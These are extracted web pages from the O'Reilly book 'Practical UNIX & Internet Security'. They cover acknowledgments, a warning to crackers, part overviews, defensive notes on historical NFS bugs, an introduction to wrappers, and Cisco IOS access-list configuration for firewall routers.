Carolyn Godfrey (HP), Casper Dik (Sun), Andreas Siegert (IBM/AIX), and Grant Taylor (Linux),<br />

Several people reviewed particular chapters. Peter Salus reviewed the introductory chapter; Ed Ravin<br />

(NASA Goddard Institute for Space Studies) reviewed the UUCP chapter; Adam Stein and Matthew<br />

Howard (Cisco) reviewed the networking chapters; Lincoln Stein (MIT Whitehead Institute) reviewed<br />

the World Wide Web chapter. Wietse Venema reviewed the chapter on wrappers.<br />

Æleen Frisch, author of Essential System Administration (<strong>O'Reilly</strong> & Associates, 1995) kindly allowed<br />

us to excerpt the section on access control lists from her book.<br />

Thanks to the many people from <strong>O'Reilly</strong> & Associates who turned our manuscript into a finished<br />

product. Debby Russell did another command performance in editing this book and coordinating the<br />

review process. Mike Sierra and Norman Walsh provided invaluable assistance in moving <strong>Practical</strong><br />

<strong>UNIX</strong> <strong>Sec</strong>urity 's original troff files into FrameMaker format and in managing an increasingly large and<br />

complex set of Frame and SGML tools. Nicole Gipson Arigo did a wonderful job as production manager<br />

for this job. Clairemarie Fisher O'Leary assisted with the production process and managed the work of<br />

contractors. Kismet McDonough-Chan performed a quality assurance review, and Cory Willing<br />

proofread the manuscript. Nancy Priest created our interior design. Chris Reilley developed the new<br />

figures. Edie Freedman redesigned the cover. And Seth Maislin gave us a wonderfully usable index.<br />

Thanks to Gene's wife Kathy and daughter Elizabeth for tolerating continuing mentions of "The Book"<br />

and for many nights and weekends spent editing. Kathy also helped with the proofreading.<br />

Between the first and second editions of this book, Simson was married to Elisabeth C. Rosenberg.<br />

Special thanks are due to her for understanding the amount of time that this project has taken.<br />

Online Information Comments and Questions<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_06.htm (2 of 3) [2002-04-12 10:45:54]


[Preface] Acknowledgments<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_06.htm (3 of 3) [2002-04-12 10:45:54]


[Preface] Comments and Questions<br />

Preface<br />

Comments and Questions<br />

We have tested and verified all of the information in this book to the best of our ability, but you may find<br />

that features have changed, typos have crept in, or that we have made a mistake. Please let us know about<br />

what you find, as well as your suggestions for future editions, by contacting:<br />

<strong>O'Reilly</strong> & Associates, Inc.<br />

101 Morris Street<br />

Sebastopol, CA 95472<br />

1-800-998-9938 (in the US or Canada)<br />

1-707-829-0515 (international/local)<br />

1-707-829-0104 (FAX)<br />

You can also send us messages electronically. See the insert in the book for information about all of<br />

<strong>O'Reilly</strong> & Associates' online services.<br />

Acknowledgments A Note to Computer Crackers<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_07.htm [2002-04-12 10:45:54]


[Preface] A Note to Computer Crackers<br />

Preface<br />

A Note to Computer Crackers<br />

We've tried to write this book in such a way that it can't be used easily as a "how-to" manual for potential<br />

system crackers. Don't buy this book if you are looking for hints on how to break into systems. If you are<br />

a system cracker, consider applying your energy and creativity to solving some of the more pressing<br />

problems facing us all, rather than creating new problems for overworked computer users and<br />

administrators. Breaking into computer systems is not proof of special ability, and breaking into someone<br />

else's machine to demonstrate a security problem is nasty and destructive, even if all you do is "look<br />

around."<br />

The names of systems and accounts in this book are for example purposes only. They are not meant to<br />

represent any particular machine or user. We explicitly state that there is no invitation for people to try to<br />

break into the authors' or publisher's computers or the systems mentioned in this text. Any such attempts<br />

will be prosecuted to the fullest extent of the law, whenever possible. We realize that most of our readers<br />

would never even think of behaving this way, so our apologies to you for having to make this point.<br />

Comments and Questions I. Computer <strong>Sec</strong>urity Basics<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_08.htm [2002-04-12 10:45:54]


[Part I] Computer <strong>Sec</strong>urity Basics<br />

Part I<br />

Part I: Computer <strong>Sec</strong>urity Basics<br />

This part of the book provides a basic introduction to security policy. These chapters are intended to be<br />

accessible to both users and administrators.<br />

●<br />

●<br />

Chapter 1, Introduction, provides a history of the <strong>UNIX</strong> operating system and an introduction to<br />

<strong>UNIX</strong> security. It also introduces basic terms we use throughout the book.<br />

Chapter 2, Policies and Guidelines, examines the role of setting good policies to guide protection<br />

of your systems. It also describes the tradeoffs that must be made to account for cost, risk, and<br />

corresponding benefits.<br />

A Note to Computer Crackers 1. Introduction<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/part01.htm [2002-04-12 10:45:54]


[Part II] User Responsibilities<br />

Part II<br />

Part II: User Responsibilities<br />

This part of the book provides a basic introduction to <strong>UNIX</strong> host security. These chapters are intended to<br />

be accessible to both users and system administrators.<br />

●<br />

●<br />

●<br />

●<br />

Chapter 3, Users and Passwords, is about <strong>UNIX</strong> user accounts. It discusses the purpose of<br />

passwords, explains what makes good and bad passwords, and describes how the crypt () password<br />

encryption system works.<br />

Chapter 4, Users, Groups, and the Superuser, describes how <strong>UNIX</strong> groups can be used to control<br />

access to files and devices. It also discusses the <strong>UNIX</strong> superuser and the role that special users<br />

play.<br />

Chapter 5, The <strong>UNIX</strong> Filesystem, discusses the security provisions of the <strong>UNIX</strong> filesystem and<br />

tells how to restrict access to files and directories to the file's owner, to a group of people, or to<br />

everybody on the computer system.<br />

Chapter 6, Cryptography, discusses the role of encryption and message digests in your security. It<br />

includes a discussion of how various popular encryption schemes, including the PGP mail<br />

package, work.<br />

2.5 The Problem with<br />

<strong>Sec</strong>urity Through Obscurity<br />

3. Users and Passwords<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/part02.htm [2002-04-12 10:45:55]


[Chapter 4] 4.4 Summary<br />

4.4 Summary<br />

Chapter 4<br />

Users, Groups, and the<br />

Superuser<br />

Every account on your <strong>UNIX</strong> system should have a unique UID. This UID is used by the system to<br />

determine access rights to various files and services. Users should have unique UIDs so their actions can<br />

be audited and controlled.<br />

Each account also belongs to one or more groups, represented by GIDs. You can use group memberships<br />

to designate access to resources shared by more than one user.<br />

Your computer has a special account called root, which has complete control over the system. Be sure to<br />

limit who has access to the root account, and routinely check for bad su attempts. If possible, you should<br />

have all of the machines on your network log bad su attempts to a specially appointed secure machine.<br />

Each computer on your network should have a different superuser password.<br />

4.3 su: Changing Who You<br />

Claim to Be<br />

5. The <strong>UNIX</strong> Filesystem<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch04_04.htm [2002-04-12 10:45:55]


[Part III] System <strong>Sec</strong>urity<br />

Part III<br />

Part III: System <strong>Sec</strong>urity<br />

This part of the book is directed primarily towards the <strong>UNIX</strong> system administrator. It describes how to<br />

configure <strong>UNIX</strong> on your computer to minimize the chances of a break-in, as well as to limit the<br />

opportunities for a nonprivileged user to gain superuser access.<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Chapter 7, Backups, discusses how and why to make archival backups of your storage. It includes<br />

discussions of backup strategies for different types of organizations.<br />

Chapter 8, Defending Your Accounts, describes ways that a computer cracker might try to initially<br />

break into your computer system. By knowing these "doors" and closing them, you increase the<br />

security of your system.<br />

Chapter 9, Integrity Management, discusses how to monitor your filesystem for unauthorized<br />

changes. This includes coverage of the use of message digests and read-only disks, and the<br />

configuration and use of the Tripwire utility.<br />

Chapter 10, Auditing and Logging, discusses the logging mechanisms that <strong>UNIX</strong> provides to help<br />

you audit the usage and behavior of your system.<br />

Chapter 11, Protecting Against Programmed Threats, is about computer viruses, worms, and<br />

Trojan horses. This chapter contains detailed tips that you can use to protect yourself from these<br />

electronic vermin.<br />

Chapter 12, Physical <strong>Sec</strong>urity. What if somebody gets frustrated by your super-secure system and<br />

decides to smash your computer with a sledgehammer? This chapter describes physical perils that<br />

face your computer and its data and discusses ways of protecting them.<br />

Chapter 13, Personnel <strong>Sec</strong>urity, examines concerns about who you employ and how they fit into<br />

your overall security scheme.<br />

6.7 Encryption and U.S. Law 7. Backups<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/part03.htm [2002-04-12 10:45:55]


[Part IV] Network and <strong>Internet</strong> <strong>Sec</strong>urity<br />

Part IV<br />

Part IV: Network and <strong>Internet</strong> <strong>Sec</strong>urity<br />

This part of the book is about the ways in which individual <strong>UNIX</strong> computers communicate with one<br />

another and with the outside world, and the ways that these systems can be subverted by attackers to<br />

break into your computer system. Because many attacks come from the outside, this chapter is vital<br />

reading for anyone whose computer has outside connections.<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Chapter 14, Telephone <strong>Sec</strong>urity, describes how modems work and provides step-by-step<br />

instructions for testing your computer's modems to see if they harbor potential security problems.<br />

Chapter 15, UUCP, is about the <strong>UNIX</strong>-to-<strong>UNIX</strong> copy system, which can use standard phone lines<br />

to copy files, transfer electronic mail, and exchange news. This chapter explains how UUCP works<br />

and tells you how to make sure that it can't be subverted to damage your system.<br />

Chapter 16, TCP/IP Networks, provides background on how TCP/IP networking programs work<br />

and describes the security problems they pose.<br />

Chapter 17, TCP/IP Services, discusses the common IP network services found on <strong>UNIX</strong> systems,<br />

coupled with common problems and pitfalls.<br />

Chapter 18, WWW <strong>Sec</strong>urity, describes some of the issues involved in running a WWW server<br />

without opening your system to security problems. The issues discussed here should also be borne<br />

in mind when operating any other kind of network-based information server.<br />

Chapter 19, RPC, NIS, NIS+, and Kerberos, discusses a variety of network information services. It<br />

covers some of how they work, and common pitfalls.<br />

Chapter 20, NFS, describes how Sun Microsystems' Network Filesystem works and its potential<br />

security problems.<br />

13.3 Outsiders 14. Telephone <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/part04.htm [2002-04-12 10:45:55]


[Chapter 20] 20.5 Some Last Comments<br />

Chapter 20<br />

NFS<br />

20.5 Some Last Comments<br />

Here are a few final words about NFS.<br />

20.5.1 Well-Known Bugs<br />

NFS depends on NIS or NIS+ on many machines. Both NFS and NIS implementations have had some<br />

well-known implementation flaws and bugs in recent years. Not only are these flaws well-known, there<br />

are a number of hacker toolboxes available that include programs to take advantage of these flaws.<br />

Therefore, if you are running NFS, you should be certain that you are up to date on vendor patches and<br />

bug fixes. In particular:<br />

●<br />

●<br />

●<br />

●<br />

Make sure that your version of the RPC portmapper does not allow proxy requests and that your<br />

own system is not in the export list for a partition. Otherwise, a faked packet sent to your RPC<br />

system can be made to fool your NFS system into acting as if the packet was valid and came from<br />

your own machine.<br />

Make sure that your NFS either uses <strong>Sec</strong>ure RPC, or examines the full 32 bits of the UIDS passed<br />

in. Some early versions of NFS only examined the least significant 16 bits of the passed-in UID<br />

for some tests, so accesses could be crafted that would not get mapped to nobody, and would<br />

function as root accesses.<br />

Make sure that your version of NFS does not allow remote users to issue mknod commands on<br />

partitions they import from your servers. A user creating a new /dev/kmem file on your partition<br />

has made a big first step towards a complete compromise of your system.<br />

Make sure that your NFS does the correct thing when someone does a cd.. in the top level of an<br />

imported directory from your server. Some older versions of NFS would return a file handle to the<br />

server's real parent directory instead of the parent to the client's mount point. Because NFS doesn't<br />

know how you get file handles, and it applies permissions on whole partitions rather than mount<br />

points, this process could lead to your server's security being compromised.<br />

In particular, when a server would export a subdirectory as the root partition for a diskless<br />

workstation, a user on the workstation could do cd /; cd... and instead of getting the root directory<br />

again, they would have access to the parent directory on the server! Further compounding this<br />

scenario, the export of the partition needed to be done with root= access. As a result, clients would<br />

have unrestricted access to the server's disks!<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_05.htm (1 of 3) [2002-04-12 10:45:56]


[Chapter 20] 20.5 Some Last Comments<br />

●<br />

Make sure that your server parses the export option list correctly. Some past and current NFS<br />

implementations get accesses mixed up. If you specify access= and rw= on the same export, or<br />

access= and root=, the system sometimes forgets the access= specification and exports the<br />

partition to every other machine in the world.<br />

20.5.2 For Real <strong>Sec</strong>urity, Don't Use NFS<br />

NFS and other distributed filesystems provide some wonderful functions. They are also a source of<br />

continuing headaches. You should consider the question of whether you really need all the flexibility and<br />

power of NFS and distributed systems. By reexamining your fundamental assumptions, you may find<br />

that you can reconfigure your systems to avoid NFS problems completely, by eliminating NFS.<br />

For instance, one reason that is often given for having NFS is to easily keep software in sync on many<br />

machines at once. However, that argument was more valid before the days of high-speed local networks<br />

and cheap disks. You might be better served by equipping each workstation in your enterprise with a<br />

2GB or 4GB disk, with a complete copy of all of your applications residing on each machine. You can<br />

use a facility such as rdist (see Chapter 9) to make necessary updates. Not only will this configuration<br />

give you better security, but it will also provide better fault tolerance: if the server or network goes down,<br />

each system has everything necessary to continue operation. This configuration also facilitates system<br />

customization.<br />

A second argument for network filesystems is that they allow users to access their home accounts with<br />

greater ease, no matter which machine they use. But while this may make sense in a university student<br />

lab, most employees almost always use the same machine, so there is no reason to access multiple<br />

machines as if they were equivalent.<br />

Network filesystems are sometimes used to share large databases from multiple points. But network<br />

filesystems are a poor choice for this application because locking the database and synchronizing updates<br />

is usually more difficult than sharing a single machine using remote logins. In fact, with the X Window<br />

System, opening a window on a central database machine is convenient and often as fast (or faster) than<br />

accessing the data via a network filesystem. Alternatively, you can use a database server, with client<br />

programs that are run locally.<br />

The argument is also made that sharing filesystems over the network results in lower cost. In point of<br />

fact, such a configuration may be more expensive than the alternatives. For instance, putting<br />

high-resolution color X display terminals on each desktop and connecting them with 100MB Ethernet to<br />

a multiprocessor server equipped with RAID disk may be more cost-effective, provide better security,<br />

give better performance, and use less electricity. The result may be a system that is cheaper to buy,<br />

operate, and maintain. The only loss is the cachet of equipping each user with a top-of-the-line<br />

workstation on his desktop when all he really needs is access to a keyboard, mouse, and fast display.<br />

Indeed, the only argument for network filesystems may be security. Today most X terminals have no<br />

support for encryption.[13] On client/server-based systems that use Kerberos or DCE, you can avoid<br />

sending unencrypted passwords and user data over the network. But be careful: you will only get the data<br />

confidentiality aspects of this approach if your remote filesystem encrypts all user data; most don't.<br />

[13] We expect this to change in the near future.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_05.htm (2 of 3) [2002-04-12 10:45:56]


[Chapter 20] 20.5 Some Last Comments<br />

Questioning your basic assumptions may simultaneously save you time, money, and improve your<br />

security.<br />

20.4 Improving NFS <strong>Sec</strong>urity V. Advanced Topics<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_05.htm (3 of 3) [2002-04-12 10:45:56]


[Part V] Advanced Topics<br />

Part V<br />

Part V: Advanced Topics<br />

This part of the book discusses issues that arise when organizational networks are interconnected with<br />

the <strong>Internet</strong>. It also discusses ways of increasing your security through better programming.<br />

●<br />

●<br />

●<br />

Chapter 21, Firewalls, describes how to set up various types of "firewalls" to protect an internal<br />

network from an external attacker.<br />

Chapter 22, Wrappers and Proxies, describes a few common wrapper and proxying programs that<br />

help protect your machine and the programs within it without requiring access to source code.<br />

Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs, describes common pitfalls when writing<br />

your own software. It gives tips on how to write robust software that will resist attack from<br />

malicious users.<br />

20.5 Some Last Comments 21. Firewalls<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/part05.htm [2002-04-12 10:45:56]


[Chapter 22] Wrappers and Proxies<br />

Chapter 22<br />

22. Wrappers and Proxies<br />

Contents:<br />

Why Wrappers?<br />

sendmail (smap/smapd) Wrapper<br />

tcpwrapper<br />

SOCKS<br />

UDP Relayer<br />

Writing Your Own Wrappers<br />

A wrapper is a program that is used to control access to a second program. The wrapper literally wraps<br />

around the second program, allowing you to enforce a higher degree of security than the program can<br />

enforce on its own.<br />

22.1 Why Wrappers?<br />

Wrappers are a recent invention in <strong>UNIX</strong> security. These programs were born out of the need to modify<br />

operating systems without access to the systems' source code. However, their use has grown. and<br />

wrappers have become a rather elegant security tool for a variety of reasons:<br />

●<br />

●<br />

●<br />

Because the security logic is encapsulated into a single program, wrappers are simple and easy to<br />

validate.<br />

Because the wrapped program remains a separate entity, it can be upgraded without a need to<br />

recertify the program that is wrapping it.<br />

Because wrappers call the wrapped program via the standard exec() system call, a single wrapper<br />

can be used to control access to a variety of wrapped programs.<br />

One common use of wrappers is to limit the amount of information reaching a network-capable program.<br />

The default design of such programs can be too trusting, and can accept too much information without<br />

validation. We will discuss a few common examples later in this chapter.<br />

This chapter describes three common wrappers:<br />

●<br />

A sendmail wrapper (smap/smapd) developed by Trusted Information Systems (TIS)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_01.htm (1 of 2) [2002-04-12 10:45:56]


[Chapter 22] Wrappers and Proxies<br />

●<br />

●<br />

A general-purpose wrapper (tcpwrapper) for UDP and TCP daemons, developed by Wietse<br />

Venema<br />

SOCKS, a wrapper that permits outbound TCP/IP connections to tunnel through firewalls,<br />

developed by David Koblas and Michelle Koblas<br />

This chapter also briefly describes the UDP Relayer, developed by Tom Fitzgerald. The final section of<br />

this chapter describes the situations in which you might wish to write wrappers of your own.<br />

21.6 Final Comments 22.2 sendmail (smap/smapd)<br />

Wrapper<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_01.htm (2 of 2) [2002-04-12 10:45:56]


[Chapter 21] 21.3 Example: Cisco Systems Routers as Chokes<br />

Chapter 21<br />

Firewalls<br />

21.3 Example: Cisco Systems Routers as Chokes<br />

Many organizations use high-performance routers both to connect their companies to the <strong>Internet</strong> and to perform limited<br />

packet filtering. Because routers made by Cisco Systems, Inc., are widely used within the <strong>Internet</strong> community as this<br />

book is being written, we decided that a look at the security configuration for a Cisco router might be helpful.<br />

NOTE: Bear in mind that this description is not a definitive reference for configuring Cisco routers, but is<br />

intended to demonstrate highlights of how a router is configured as a choke. Further examples of Cisco<br />

configurations may be obtained via FTP from ftp://ftp.cisco.com/pub/acl-examples.<br />

Please also note that we do not intend that our inclusion of vendor-specific information for Cisco routers be<br />

taken as an endorsement of their routers over any other vendor's products.<br />

Cisco Systems routers run a complicated operating system called <strong>Internet</strong>work Operating System (IOS), which is<br />

specially tailored to perform high-speed routing. It is a real-time operating system that is not based on <strong>UNIX</strong>.<br />

IOS maintains a set of internal configuration tables that are associated with the router, each protocol that the router<br />

understands, each network interface, and each physical "line" interface. These configuration tables are consulted by the<br />

IOS operating system each time a packet is received for routing.<br />

The IOS internal tables are configured from the console when the router is in configuration mode. The current<br />

configuration can be extracted from the router using the write command; this command produces a text file of commands<br />

that can be stored in the router's nonvolatile memory or saved using a network TFTP server. The router then interprets<br />

these commands when it boots as if they were typed on the router's console.<br />

21.3.1 access-list Command: Creating an Access List<br />

IOS uses the access-list command to define the set of IP addresses and protocols with which a particular router will<br />

communicate. The access-list command creates an access list; each access list has a unique number. IOS sets aside<br />

specific ranges of access-list numbers for specific purposes.<br />

21.3.1.1 access-list: standard form<br />

The standard form of the access-list command for the IP protocol has the form:<br />

access-list access-list-number {deny|permit} source [source-mask]<br />

Where:<br />

access-list-number<br />

Denotes the number of the access list you are defining. For the standard form of the access-list command, the<br />

access-list-number must be a decimal integer from 1 though 99.<br />

deny | permit<br />

Specifies whether IP packets matching this access list should be denied (not transmitted) or permitted<br />

(transmitted).<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_03.htm (1 of 5) [2002-04-12 10:45:57]


[Chapter 21] 21.3 Example: Cisco Systems Routers as Chokes<br />

source<br />

Specifies the IP address of the host or network from which this packet is being sent. Source must be in the standard<br />

form ii.jj.kk.ll.<br />

source-mask<br />

An optional mask that is applied to the source. As with the source, the source-mask is specified in four-part<br />

dotted-decimal notation. A 1 in a position indicates that it should be masked (ignored). Thus, 0.0.0.255 means that<br />

only the first three octets of the source address will be considered.<br />

If you specify an access-list, IOS will add an implicit rule to deny all packets that do not match the rules that you have<br />

provided.<br />

For example, this command would permit all packets from the host 204.17.195.100:<br />

access-list 1 permit 204.17.195.100<br />

This command would deny all packets from the IP subclass C network 198.3.4:<br />

access-list 1 deny 198.3.4.0 0.0.0.255<br />

21.3.1.2 access-list: extended form<br />

The access-list command has an extended form which allows you to make distinctions based on the particular IP protocol<br />

and service.[8] In the case of the TCP/IP protocol, you can even create restrictions based on the connection's direction -<br />

whether it is outgoing or incoming.<br />

[8] In addition to IP, Cisco routers support many other protocols as well, including AppleTalk and IPX, but<br />

we won't discuss them here.<br />

The extended version of the access-list command has syntax that is similar to the standard form; the key difference is that<br />

the access-list-number must be in the range 100 to 199, and there are additional parameters:<br />

access-list access-list-number {deny|permit} protocol\<br />

source source-mask destination destination-mask [established]<br />

Where:<br />

access-list-number<br />

Denotes the number of the access list that you are defining. For the extended form of the access-list command, the<br />

access-list-number must be a decimal integer from 100 though 199.<br />

deny | permit<br />

Specifies whether IP packets matching this access list should be denied (not transmitted) or permitted<br />

(transmitted).<br />

protocol<br />

Specifies the protocol name or number. Specify ip, tcp, udp, icmp, igmp, gre, igrp, or the IP protocol number<br />

(range 0 through 255). Use ip to specify all IP protocols, including TCP, UDP, and ICMP.<br />

source<br />

Specifies the IP address of the host or network from which this packet is being sent; must be in the standard form<br />

ii.jj.kk.ll.<br />

source-mask<br />

An optional mask that is applied to the source. As with the source, the source-mask is specified in four-part<br />

dotted-decimal notation. A 1 in a position indicates that it should be masked. Thus, 0.0.0.255 means that only the<br />

first three octets of the source addresses should be considered.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_03.htm (2 of 5) [2002-04-12 10:45:57]


destination<br />

Specifies the address of the host or network to which this packet is being sent; must be in the standard form<br />

ii.jj.kk.ll.<br />

destination-mask<br />

An optional mask that is applied to the destination. As with the source-mask, the destination-mask is specified in<br />

four-part dotted-decimal notation, where a 1 in a position indicates that it should be masked.<br />

operator<br />

This optional argument allows you to specify a particular TCP or UDP port, or even a range of ports. Allowable<br />

values are described in Table 21.1.<br />

operand<br />

A number, in decimal, used to refer to a specific TCP or UDP port.<br />

Table 21.1: Cisco Operator/Operand Combinations<br />

Operator Meaning Example Result<br />

eq equal to eq 23 Selects Telnet port.<br />

gt greater than gt 1023 Selects all non-privileged ports.<br />

lt less than lt 1024 Selects all privileged ports.<br />

neq not equal to neq 25 Selects all protocols other than SMTP.<br />

established<br />

log<br />

[Chapter 21] 21.3 Example: Cisco Systems Routers as Chokes<br />

If present, indicates packets for an established connection. This is only applicable to the TCP protocol, and selects<br />

for packets that have the ACK or RST bits set. By blocking packets that do not have either the ACK or RST bits<br />

set that are traveling into your organization's network, you can block incoming connections while still allowing<br />

outgoing connections.<br />

If present, causes violations of access lists to be logged via syslog to the specified logging host.<br />

21.3.2 show access-lists Command: Seeing the Current Access Lists<br />

You can use the CIOS show access-lists command to display all of the current access lists. For example:<br />

router>show access-lists<br />

Standard IP access list 1<br />

permit 204.17.195.0<br />

permit 199.232.92.0<br />

Extended IP access list 108<br />

deny ip 199.232.92.0 0.0.0.255 any<br />

deny ip 204.17.195.0 0.0.0.255 any<br />

permit ip any any (1128372 matches)<br />

router><br />

In this example, there are two IP access lists: access list #1, which is a standard list, and access list #108, which is an<br />

extended list. The standard list permits the transmission of any packet that comes from the IP networks 204.17.195 or<br />

199.232.92; the extended list denies any packet coming from these two networks.<br />

The pair of rules in this example can be used to erect a barrier to IP spoofing for an organization that is connected to the<br />

<strong>Internet</strong>. The organization, with two internal IP networks (204.17.195 and 199.232.92), could apply the first access list to<br />

its outbound interface, and the extended list to inbound packets from its serial interface. As a result, any incoming<br />

packets that claim to be from the organization's internal network would be rejected.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_03.htm (3 of 5) [2002-04-12 10:45:57]


[Chapter 21] 21.3 Example: Cisco Systems Routers as Chokes<br />

Be aware that the show access-lists command is normally not a privileged command; anybody who can log into your<br />

router can see all of your access lists. You can make it privileged by using the IOS privilege commands added in IOS<br />

Version 10.3.<br />

21.3.3 access-class Command: Protecting Virtual Terminals<br />

After you have created one or more access lists, you can use the access-class command to assign the access-control list to<br />

a particular Cisco virtual-terminal line. You assign access lists to a particular Cisco interface by using the access-class<br />

command. You should use the access-class command to configure your router so that it will reject login attempts from<br />

any host outside your organization. You may also wish to configure your router so that it rejects all login attempts from<br />

inside your organization as well, with the exception of a specially designed administrative machine.<br />

The access-class command has the following syntax:<br />

access-class access-list-number {in|out}<br />

Where:<br />

access-list-number<br />

Specifies the number of an access list. This must be a number between 1 and 199.<br />

in | out<br />

Specifies whether incoming connections or outgoing connections should be blocked.<br />

You can use this command to prevent people from logging directly onto your router (using one of the vty interfaces)<br />

unless they are coming from a specially designated network. For example, to configure your router so that it will only<br />

accept logins from the subclass C network 198.3.3, you could use the following sequence of IOS commands:<br />

router#config t<br />

Enter configuration commands, one per line. End with CNTL/Z.<br />

router(config)#access-list 12 permit 198.3.3.0 0.0.0.255<br />

router(config)#line vty 0 4<br />

router(config-line)#access-class 12 in<br />

router(config-line)#^Z<br />

router#<br />

21.3.4 ip access-group Command: Protecting IP Interfaces<br />

You can also use access lists to specify packets that should be blocked from crossing an IP interface. For example, if you<br />

are using the Cisco interface to create a conventional choke-and-gate interface, and you have a serial connection to an<br />

<strong>Internet</strong> service provider, you can specify that the only IP packets that should be transmitted in from the interface should<br />

be those that are destined for the gate machine, and that the only IP packets that should be transmitted out from the serial<br />

interface are those that are from your gate.<br />

The command that associates an access list with a particular interface is the access-group command. This is an<br />

interface-configuration command, which means that it is typed when the router is in interface-configuration mode.<br />

The access-group command has the following syntax:<br />

ip access-group access-list-number {in | out}<br />

Where:<br />

access-list-number<br />

Specifies the number of an access list. This must be a number between 1 and 199.<br />

in | out<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_03.htm (4 of 5) [2002-04-12 10:45:57]


[Chapter 21] 21.3 Example: Cisco Systems Routers as Chokes<br />

Specifies whether incoming connections or outgoing connections should be blocked.<br />

For example, to configure your serial 0 interface so that it will only send packets to or from a gate computer located at IP<br />

address 204.17.100.200, you might configure your router as explained in the following paragraphs.<br />

First, create one access list that selects for packets that have the gate as their source (access list #10) and a second access<br />

list that selects for packets that have the gate as their destination (access list #110):<br />

router#config t<br />

Enter configuration commands, one per line. End with CNTL/Z.<br />

router(config)#access-list 10 permit 204.17.100.200 0.0.0.0<br />

router(config)#access-list 110 permit ip 0.0.0.0 255.255.255.255<br />

204.17.100.200 0.0.0.0<br />

Now, assign these access lists to the serial 0 interface:<br />

router(config)#int serial 1<br />

router(config-if)#ip access-group 10 out<br />

router(config-if)#ip access-group 110 in<br />

Remember, use the IOS write command to save the configuration.<br />

21.3.5 accounting access-violations Command: Using IP Accounting<br />

IOS has an IP accounting feature that can track the number of IP packets that are passed by the router and then rejected.<br />

You can use this feature to detect whether somebody is trying to bypass your firewall security. If logging is enabled, you<br />

will be told the IP address of the attacker and the protocol being used.<br />

To turn on IP accounting to check for access violations on a specific interface use the command:<br />

router(config-if)#ip accounting access-violations<br />

Access Control vs. Performance<br />

IOS consults the entire access control list every time a packet is received for routing. As a result, the more complicated<br />

your access lists, the slower you will find your router's resulting performance.<br />

You can maximize your router's performance, and improve overall security, by making your access lists as simple as<br />

possible. You can also improve performance by using route filtering. If you have a complex list of hosts to which you do<br />

or do not wish to offer particular services, you can supplement your access lists by using a program on your gate such as<br />

tcpwrapper, in addition to implementing them on your choke. This will give you extra protection.<br />

21.2 Building Your Own<br />

Firewall<br />

21.4 Setting Up the Gate<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_03.htm (5 of 5) [2002-04-12 10:45:57]


[Chapter 21] 21.6 Final Comments<br />

21.6 Final Comments<br />

Chapter 21<br />

Firewalls<br />

We feel ambivalent about firewalls. While they are an interesting technology, they are not a cure-all for<br />

network security problems. They also are being used to connect many networks to the <strong>Internet</strong> that<br />

should not necessarily be connected. So before you run out and invest your time and money in a firewall<br />

solution, consider these points:<br />

21.6.1 Firewalls Can Be Dangerous<br />

